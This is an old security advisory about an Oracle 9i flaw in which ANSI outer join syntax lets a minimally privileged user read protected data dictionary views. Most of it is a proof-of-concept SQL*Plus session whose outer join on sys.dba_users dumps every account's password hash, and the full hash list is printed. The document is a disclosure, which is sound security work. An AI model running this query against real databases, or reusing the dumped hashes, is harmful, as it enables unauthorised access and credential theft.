COMMAND

	Oracle ANSI outer join syntax allows access to any data for basic user

SYSTEMS AFFECTED

	Oracle 9i

PROBLEM

	In Pete Finnigan [www.pentest-limited.com] advisory :
	

	Oracle 9i  includes  the  new  ANSI  outer  join  syntax.  Oracle  still
	supports the old syntax but  in  the  new  syntax  there  is  a  serious
	security issue that allows any user to view any data.
	

	here is an example:
	 

	SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2

	

	(c) Copyright 2001 Oracle Corporation.  All rights reserved.

	

	

	Connected to:

	Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production

	With the Partitioning option

	JServer Release 9.0.1.1.1 - Production

	

	SQL> connect / as sysdba

	Connected.

	SQL> CREATE USER us1 IDENTIFIED BY us11;

	

	User created.

	

	SQL> Grant Create Session to us1;

	

	Grant succeeded.

	

	SQL> connect us1/us11;

	Connected.

	SQL> select a.username, a.password

	  2  from sys.dba_users a left outer join sys.dba_users b on

	  3  b.username = a.username

	  4  ;

	

	USERNAME                       PASSWORD

	------------------------------ ------------------------------

	SYS                            D4C5016086B2DC6A

	SYSTEM                         D4DF7931AB130E37

	DBSNMP                         E066D214D5421CCC

	AURORA$JIS$UTILITY$            INVALID_ENCRYPTED_PASSWORD

	OSE$HTTP$ADMIN                 INVALID_ENCRYPTED_PASSWORD

	AURORA$ORB$UNAUTHENTICATED     INVALID_ENCRYPTED_PASSWORD

	SCOTT                          F894844C34402B67

	US1                            491AB9AB94D8A9EF

	OUTLN                          4A3BA55E08595C81

	ORDSYS                         7EFA02EC7EA6B86F

	OLAPSVR                        AF52CFD036E8F425

	

	USERNAME                       PASSWORD

	------------------------------ ------------------------------

	OLAPSYS                        3FB8EF9DB538647C

	ORDPLUGINS                     88A2B2C183431F00

	MDSYS                          72979A94BAD2AF80

	CTXSYS                         71E687F036AD56E5

	WKSYS                          69ED49EE1851900D

	OLAPDBA                        1AF71599EDACFB00

	QS_CBADM                       7C632AFB71F8D305

	QS_ADM                         991CDDAD5C5C32CA

	QS                             8B09C6075BDF2DC4

	QS_WS                          24ACF617DD7D8F2F

	HR                             6399F3B38EDF3288

	

	USERNAME                       PASSWORD

	------------------------------ ------------------------------

	OE                             9C30855E7E0CB02D

	PM                             72E382A52E89575A

	SH                             9793B3777CD3BD1A

	QS_ES                          E6A6FA4BB042E3C2

	QS_OS                          FF09F3EB14AE5C26

	RMAN                           E7B5D92911C831E1

	QS_CB                          CF9CFACF5AE24964

	QS_CS                          91A00922D8C0F146

	

	30 rows selected.

	

	SQL> 

	

	This shows that a user  with  the  barest  of  privileges,  i.e.  CREATE
	SESSION can actually see data in the data dictionary that should not  be
	seen. In this example we can select the  list  of  usernames  and  their
	hashes.

SOLUTION

	Oracle assigned bug ID 2121935 to the issue.
	

	Its marked as fixed in version 9.2  and  will  not  be  back  ported  to
	earlier versions of Oracle.